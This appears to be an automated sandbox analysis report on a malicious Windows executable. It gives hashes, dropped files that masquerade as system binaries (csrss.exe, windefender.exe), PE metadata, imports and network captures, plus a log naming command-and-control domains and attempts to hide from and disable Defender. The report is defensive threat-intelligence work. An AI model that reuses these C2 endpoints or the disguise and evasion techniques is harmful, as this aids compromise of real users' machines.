SHA-512:	705275E4A1BA8205EB799A8CF1737BC8BA686925E52C9198A6060A7ABEEE65552A85B814AC494A4B975D496A63BE285F19A6265550585F2FC85824C42D7EFAB5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Metadefender, Detection: 14%, Browse Antivirus: ReversingLabs, Detection: 73%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................\|..............................................t...........Rich...................PE..d...l.D`..........".................T..........@..........................................`.....................................................(............`...'..............`...@...8...............................8............................................text...H........................... ..`.rdata...9.......:..................@..@.data...`....0......................@....pdata...'...`...(..................@..@_RDATA...............V..............@..@.rsrc................X..............@..@.reloc..`............Z..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001@. (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.10988191430411122
Encrypted:	false
SSDEEP:	12:26wtzXm/Ey6q99957WHrNq3qQ10nMCldimE8eawHjchv:26zl680rgLyMCldzE9BHjcZ
MD5:	B9C1230DB14496DE6055D5B6E9395E4A
SHA1:	F4933EDEDCD7E32DB93E4DCF96B0714A5B8B1E16
SHA-256:	978DEAF640341549BBA60EA2CE13B308D8F309C5904AEA1F2D4765C5006EBF34
SHA-512:	04338F1EC0EEF0A12A1E829D9996DDE13192508FFA6F9ED121E1E4E606A8CD284E38FCE2C5CB396F2D4238CA72DC6B9BE97D1290DF495BB1CDBC6219EF687937
Malicious:	false
Reputation:	unknown
Preview:	................................................................................@...X....7.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................h.`...... ........~...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.@...X....?......................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11233272756144043
Encrypted:	false
SSDEEP:	12:60zXm/Ey6q99957R1miM3qQ10nMCldimE8eawHza1miIbCf:ml68D1tMLyMCldzE9BHza1tIG
MD5:	9F9B3B15512D21DE1F624BCCCBCF0F4F
SHA1:	DEA05AE8627BF2C6EDE583F509E165FAF68B6602
SHA-256:	AD26EEE8AA560B016F1437E44671E97EB333869C71E61525FB44F6DEEF5FF268
SHA-512:	D45CF8453A2BD24CAD37D59DF48981B60117C649F153D242668F47467C92C236902C6937E2B56CB9D47F2EA34B71FBEE8C9D9DA3F72E9010D99B9BDBE09613B1
Malicious:	false
Reputation:	unknown
Preview:	................................................................................@...X...........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................h.`...... ........~...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.@...X...+......................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.. (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11225190051937713
Encrypted:	false
SSDEEP:	12:izXm/Ey6q999579b71mK2P3qQ10nMCldimE8eawHza1mKKf:nl68f71iPLyMCldzE9BHza1W
MD5:	0650567BEB256DCD76B37081C6665CAB
SHA1:	BB72A9E9E7991547FA2A3240E271F72A16EDA5DC
SHA-256:	7B401C77E4C590753E912829E138AC04D29F8A73E485D3FB2E0E579215918014
SHA-512:	223A317C6C4ED1170FD137BFB2152FD2E44617601E60C4939844A5D93F7E2F5CD20335E54061DF7B49F3288A6C4582B6EE32B1F6AD6C347701D8621B0962822E
Malicious:	false
Reputation:	unknown
Preview:	................................................................................@...X...........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................h.`...... .........~...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.@...X..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Logs\CBS\CBS.log Download File
Process:	C:\Windows\servicing\TrustedInstaller.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	modified
Size (bytes):	3080192
Entropy (8bit):	5.314134900056241
Encrypted:	false
SSDEEP:	6144:TLS5YygL1mnGVFQa/qJIxOfTFyKQel5lmhSVjfChq4TMmdqIH:TL1dq
MD5:	5BF8CD4D050C7640194325FE121E8886
SHA1:	83D2DCBD96140CCC5896D3EC79C2B481B14A524B
SHA-256:	3AC1C4CCE204DCCFC7581EF86D20DD28E1496F513312B73F248F943A940E56F1
SHA-512:	0363DEF01DEB43F1AD359F8B49FECA6E42DD37DF5D7B8AC670850C1D1C997E3D347939F9730545FD55FC5AD98317A4131C6D08E83C7753506C49FDAF17E1D6D1
Malicious:	false
Reputation:	unknown
Preview:	.2019-06-27 00:55:29, Info CBS TI: --- Initializing Trusted Installer ---..2019-06-27 00:55:29, Info CBS TI: Last boot time: 2019-06-27 00:49:51.660..2019-06-27 00:55:29, Info CBS Starting TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:4..2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:5..2019-06-27 00:55:29, Info CBS Lock: New lock added: WinlogonNotifyLock, level: 8, total lock:6..2019-06-27 00:55:29, Info CBS Ending TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Starting the TrustedInstaller main loop...2019-06-27 00:55:29, Info CBS TrustedInstaller service starts successfully...2019-06-27 00:55:29, Info CBS No startup pr

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211112_043505_916.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.328987175125568
Encrypted:	false
SSDEEP:	96:3C+Jeds2o+0K5Xu9m2YJmCevI2lQSkOP4BlT24YFziUMC76JRu:S+cil4Z2XpkCMI
MD5:	FD0FBCD9E16EBD9FCC463C657E7AFF25
SHA1:	69CDF2BB24FF95CD91EF51354C3409BE0EAA81A6
SHA-256:	A6141FB04E6906E5661120237D2B92273DDA107021B8978DEF2C186AC2B3199D
SHA-512:	B38239E40FA8061EAF0A4B49F3065158A1B94DD5125E83661B78C3AE5F4F0FC513AA863088015538EE34FAF8B6E86ECE6C03D6E60B58B357D04785C6F4D1A768
Malicious:	false
Reputation:	unknown
Preview:	.... ... ....................................... ...!...............................T............................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... .........~...........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.1.1.2._.0.4.3.5.0.5._.9.1.6...e.t.l.........P.P.....T...........................................................................................................................................................................................................................................................................

C:\Windows\rss\csrss.exe Download File
Process:	C:\Users\user\Desktop\1dyvctHqv1.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4534824
Entropy (8bit):	7.94859431801313
Encrypted:	false
SSDEEP:	98304:3Xj3/ubRQm+WroFA4ER90iSogFPCINkyYQaf+wl9p/:HTw+TuHf4Fd6yLSX
MD5:	430E6667D7609792F43EF40150050E19
SHA1:	A2766C9BC772D3E5970AD00D25DDD460DFC9322C
SHA-256:	1E227B989A219D8A1BA81633A8FF218E1ACD87EC718382C0CB3CE5166D3F8C00
SHA-512:	379C77B619A279496DAD41FFBDD3430544BC97A5B429B01C73E298EA2F7A6586F82EBC93A2A945F26DC3155AF2E270D693A2E1D6075675265318E2455D802822
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 25%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2T.2T.2T..T.2T..T.2T..T..2T..T.2T.3TJ.2T..T.2T..T.2T..T.2TRich.2T................PE..L...YU._..................C...p.....`.A.......C...@..................................E.......................................C.P.......X^...........*E.(....p......P.................................A.@............................................text.....C.......C................. ..`.data...tho...C.......C.............@....rsrc...X^.......`....C.............@..@.reloc... ...p..."....D.............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\windefender.exe Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	2102272
Entropy (8bit):	7.879347868736008
Encrypted:	false
SSDEEP:	49152:1+yuly+dcYwIx9qadRmAYBfo9hazz2Du5VDyn:1Cy+qa9qWmAYBQfazzpDy
MD5:	E0A50C60A85BFBB9ECF45BFF0239AAA3
SHA1:	AE0E12BC885CB5D4D26C49F6AE20ED40313EDF99
SHA-256:	FC8D064E05EBE37D661AECCB78F91085845E9E28CCFF1F9B08FD373830E38B7F
SHA-512:	03D1440B462B872B7AE4FCCBB455FC0C3AB4E9BF13D07726CE2A9FF9CE4A0E7632A45AF4B52265973D51C8C9D6E24CE84EF81FBAD23CDDF04B64F461FA55050D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Metadefender, Detection: 29%, Browse Antivirus: ReversingLabs, Detection: 79%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........K............... ......p-...M...-...M...@...........................M...............................................M.....................................................................................................................UPX0.....p-.............................UPX1...... ...-... .................@...UPX2..........M....... .............@...3.95.UPX!....Y.P....dM... ...K.&'....... Go build ID: "8LgdNw10OMnjnEaf..o.ouob/F_u>d7bw5LzGyMt067q/f_4E....n-IIykrT4Xu-NukD/RUnzYH.IbGfj....1LuaRla". ...d...........;a.v ....'....D$...$...`..k..&...............f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..\|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.\|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..$.........L....A....9.}..w._.9.- .9....5...p........

\Device\Null Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1893
Entropy (8bit):	4.99447065090581
Encrypted:	false
SSDEEP:	48:VgOB9oU6B9r5ExQI7mcaKM4u2/dS1oC/dS1nz:Vgnp5ExQI7hM4u2VSjVSZ
MD5:	7F35B09F9F25F6C5E461AFC2FF7994D7
SHA1:	C7F60DFCB039B3E52E76F9E6769DEC7C564C4114
SHA-256:	92BD529AABC12538E09AA1D48E52EA79AA455B8E58A224630CCF5392F2FA9D49
SHA-512:	F9AAF8F17A6A928D490DFB429629691194DE097AE5441CB0E1E59D7959C154A26849C17DB6AF3D7317019CC0F9F88AFE88763D86F961301ACEF754EC8F8B2F45
Malicious:	false
Reputation:	unknown
Preview:	2021/11/11 20:35:28 servers count 16.2021/11/11 20:35:28 logs endpoint https://runmodes.com/api/log.2021/11/11 20:35:28 initial server https://server3.trumops.com.2021/11/11 20:35:28 first install, ignore discover on start.2021/11/11 20:35:28 default browser ChromeHTML.2021/11/11 20:35:32 before EfiGuard.2021/11/11 20:35:36 poll response body {"signature":"6fc4f105cf61f304ed46b9f03bfa441f52c9e9b07f716e74998b56bf1429c7c04b25cb99a774c7d0caa79c6cc78bf9813336f45a71d4a270bf12afe2630fde08"}.2021/11/11 20:35:36 poll signature verified 6fc4f105cf61f304ed46b9f03bfa441f52c9e9b07f716e74998b56bf1429c7c04b25cb99a774c7d0caa79c6cc78bf9813336f45a71d4a270bf12afe2630fde08.2021/11/11 20:35:39 reboot in 1s.2021/11/11 20:35:40 rebooting now.2021/11/11 20:35:44 failed to hide app: unacceptable PGDSE state: 65.2021/11/11 20:35:47 couldn't exclude temp defender: couldn't create device: The system cannot find the file specified..2021/11/11 20:35:47 service is not running.2021/11/11 20:35:47 service needs an up

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.94859431801313
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	1dyvctHqv1.exe
File size:	4534824
MD5:	430e6667d7609792f43ef40150050e19
SHA1:	a2766c9bc772d3e5970ad00d25ddd460dfc9322c
SHA256:	1e227b989a219d8a1ba81633a8ff218e1acd87ec718382c0cb3ce5166d3f8c00
SHA512:	379c77b619a279496dad41ffbdd3430544bc97a5b429b01c73e298ea2f7a6586f82ebc93a2a945f26dc3155af2e270d693a2e1d6075675265318e2455d802822
SSDEEP:	98304:3Xj3/ubRQm+WroFA4ER90iSogFPCINkyYQaf+wl9p/:HTw+TuHf4Fd6yLSX
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\...2T..2T..2T...T..2T...T..2T...T..2T...T..2T..3TJ.2T...T..2T...T..2T...T..2TRich..2T................PE..L...YU._...........

File Icon


Icon Hash:	a2e8e8e8a2a2a488

Static PE Info

General
Entrypoint:	0x819e60
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5F145559 [Sun Jul 19 14:14:49 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	f3ed7d9c3a0be141edff0347fe399ebd

Authenticode Signature

Signature Valid:	false
Signature Issuer:	PostalCode=10301
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	11/11/2021 11:24:05 AM 11/11/2022 11:24:05 AM
Subject Chain	PostalCode=10301
Version:	3
Thumbprint MD5:	04FCA249099A61FA61BE244DDBB9EAEB
Thumbprint SHA-1:	9C5051C15E85D45A8276B4628BAEBEF14F3AA86D
Thumbprint SHA-256:	9D3A16DB77BCD71A7DB183660A83B99A8013E2397ED2953193ED3BA03D4C1A54
Serial:	00C794307A62076B3E20E6E9A3C9CA994D

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007FA3447E705Bh
call 00007FA3447E2086h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 00838B50h
push 0081EBA0h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF98h
push ebx
push esi
push edi
mov eax, dword ptr [0083ABE0h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00401098h]
cmp dword ptr [02F2F870h], 00000000h
jne 00007FA3447E2080h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
call dword ptr [00401124h]
call 00007FA3447E2203h
mov dword ptr [ebp-6Ch], eax
call 00007FA3447EA32Bh
test eax, eax
jne 00007FA3447E207Ch
push 0000001Ch
call 00007FA3447E21C0h
add esp, 04h
call 00007FA3447E4CD8h
test eax, eax
jne 00007FA3447E207Ch
push 00000010h
call 00007FA3447E21ADh
add esp, 04h
push 00000001h
call 00007FA3447EA2D3h
add esp, 04h
call 00007FA3447E80EBh
mov dword ptr [ebp-04h], 00000000h
call 00007FA3447E666Fh
test eax, eax

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x439184	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2b31000	0x5e58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x452a00	0x828	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2b37000	0x1ac0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1250	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4193f8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1f8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x438d80	0x438e00	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x43a000	0x26f6874	0x1600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2b31000	0x5e58	0x6000	False	0.484375	data	5.06658660024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2b37000	0x120e4	0x12200	False	0.0803879310345	data	1.03393734667	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x2b34970	0x130	data	Divehi; Dhivehi; Maldivian	Maldives
RT_CURSOR	0x2b34ab8	0x130	data	Divehi; Dhivehi; Maldivian	Maldives
RT_CURSOR	0x2b34be8	0xf0	data	Divehi; Dhivehi; Maldivian	Maldives
RT_CURSOR	0x2b34cd8	0x10a8	dBase III DBT, version number 0, next free block index 40	Divehi; Dhivehi; Maldivian	Maldives
RT_CURSOR	0x2b35db0	0x8a8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Divehi; Dhivehi; Maldivian	Maldives
RT_ICON	0x2b314b0	0x8a8	data	Spanish	Paraguay
RT_ICON	0x2b31d58	0x6c8	data	Spanish	Paraguay
RT_ICON	0x2b32420	0x568	GLS_BINARY_LSB_FIRST	Spanish	Paraguay
RT_ICON	0x2b32988	0x10a8	data	Spanish	Paraguay
RT_ICON	0x2b33a30	0x988	data	Spanish	Paraguay
RT_ICON	0x2b343b8	0x468	GLS_BINARY_LSB_FIRST	Spanish	Paraguay
RT_STRING	0x2b36798	0x150	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x2b368e8	0x252	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x2b36b40	0x318	data	Divehi; Dhivehi; Maldivian	Maldives
RT_ACCELERATOR	0x2b348e8	0x88	data	Divehi; Dhivehi; Maldivian	Maldives
RT_ACCELERATOR	0x2b34880	0x68	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_CURSOR	0x2b34aa0	0x14	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_CURSOR	0x2b35d80	0x30	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_CURSOR	0x2b36658	0x14	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_ICON	0x2b34820	0x5a	data	Spanish	Paraguay
RT_VERSION	0x2b36670	0x128	data	Divehi; Dhivehi; Maldivian	Maldives

Imports

DLL	Import
KERNEL32.dll	GetConsoleAliasesLengthW, TlsGetValue, CommConfigDialogA, SetDllDirectoryW, InterlockedIncrement, _lwrite, ZombifyActCtx, GetSystemWindowsDirectoryW, GetNamedPipeHandleStateA, SetHandleInformation, SetConsoleScreenBufferSize, CancelWaitableTimer, FreeEnvironmentStringsA, CreateNamedPipeW, GetSystemTimeAsFileTime, GetPrivateProfileStringW, ReadConsoleW, GetWindowsDirectoryA, GetSystemWow64DirectoryA, QueryActCtxW, GetSystemTimes, GetSystemDirectoryW, GlobalFindAtomA, LoadLibraryW, GetConsoleMode, CopyFileW, SizeofResource, SetVolumeMountPointA, GetVersionExW, SetConsoleMode, HeapValidate, GetVolumePathNamesForVolumeNameW, VerifyVersionInfoA, SearchPathW, CreateActCtxA, GetACP, GetStartupInfoW, FindFirstFileExA, GetLastError, IsDBCSLeadByteEx, SetLastError, GetProcAddress, SetFirmwareEnvironmentVariableW, CopyFileA, GlobalGetAtomNameA, BuildCommDCBW, GetPrivateProfileStringA, OpenWaitableTimerW, LocalAlloc, IsWow64Process, WritePrivateProfileStringA, GetModuleFileNameA, WriteProfileStringA, SetConsoleCursorInfo, GetModuleHandleA, FindFirstChangeNotificationA, GetCurrentDirectoryA, CompareStringA, GetFileTime, SetProcessShutdownParameters, ReadConsoleInputW, FileTimeToLocalFileTime, TlsFree, GetProfileSectionW, CloseHandle, CreateFileW, GetModuleFileNameW, GetComputerNameA, DeleteFileA, MultiByteToWideChar, GetCommandLineA, HeapSetInformation, EncodePointer, DecodePointer, IsProcessorFeaturePresent, InterlockedDecrement, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetModuleHandleW, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, ExitProcess, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, IsBadReadPtr, HeapCreate, WriteFile, RaiseException, GetStringTypeW, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, RtlUnwind, LCMapStringW, SetFilePointer, GetConsoleCP, HeapAlloc, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, FlushFileBuffers, SetStdHandle
USER32.dll	GetMessageTime
GDI32.dll	GetBitmapBits

Version Infos

Description	Data
Translations	0x0522 0x023c

Possible Origin

Language of compilation system	Country where language is spoken	Map
Divehi; Dhivehi; Maldivian	Maldives
Spanish	Paraguay

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2021 20:35:29.454935074 CET	49743	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:29.454983950 CET	443	49743	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:29.459800005 CET	49743	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:29.462728977 CET	49743	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:29.462758064 CET	443	49743	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:29.513391018 CET	443	49743	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:29.513986111 CET	49743	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:29.514008999 CET	443	49743	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:29.514801025 CET	49743	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:29.514812946 CET	443	49743	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:29.516657114 CET	443	49743	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:29.516674042 CET	443	49743	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:29.516801119 CET	49743	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:29.522042990 CET	49743	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:29.522221088 CET	443	49743	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:29.525162935 CET	49743	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:29.525177956 CET	443	49743	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:29.564548969 CET	49743	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:29.595845938 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.595900059 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.596199989 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.598005056 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.598031998 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.605093956 CET	443	49743	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:29.605174065 CET	443	49743	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:29.605380058 CET	49743	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:29.605423927 CET	443	49743	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:29.605441093 CET	49743	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:29.605453968 CET	443	49743	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:29.605468035 CET	49743	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:29.676192045 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.676512003 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.676587105 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.677496910 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.677510977 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.678677082 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.678910971 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.680984974 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.681046963 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.681071043 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.681102991 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.681202888 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.681231976 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.681263924 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.681282997 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.681593895 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.681629896 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.681829929 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.681844950 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.681972027 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.681987047 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.682176113 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.682187080 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.761519909 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.761754036 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.762209892 CET	49746	443	192.168.2.3	172.67.139.144
